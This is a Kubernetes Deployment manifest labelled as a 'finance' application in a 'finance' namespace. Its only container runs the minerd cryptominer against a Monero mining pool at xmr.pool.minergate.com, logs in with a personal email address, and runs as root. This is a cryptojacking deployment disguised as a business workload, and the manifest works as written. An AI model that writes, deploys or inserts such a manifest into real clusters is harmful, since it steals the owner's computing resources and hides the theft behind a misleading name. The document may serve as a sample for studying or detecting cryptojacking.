apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: finance
  name: finance
  namespace: finance
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: finance
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: finance
    spec:
      containers:
      - command:
        - minerd
        - -o
        - stratum+tcp://xmr.pool.minergate.com:45700
        - -u
        - dymurray5@gmail.com
        image: mkell43/minerd
        imagePullPolicy: Always
        name: minerd
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext:
        runAsUser: 0
      terminationGracePeriodSeconds: 30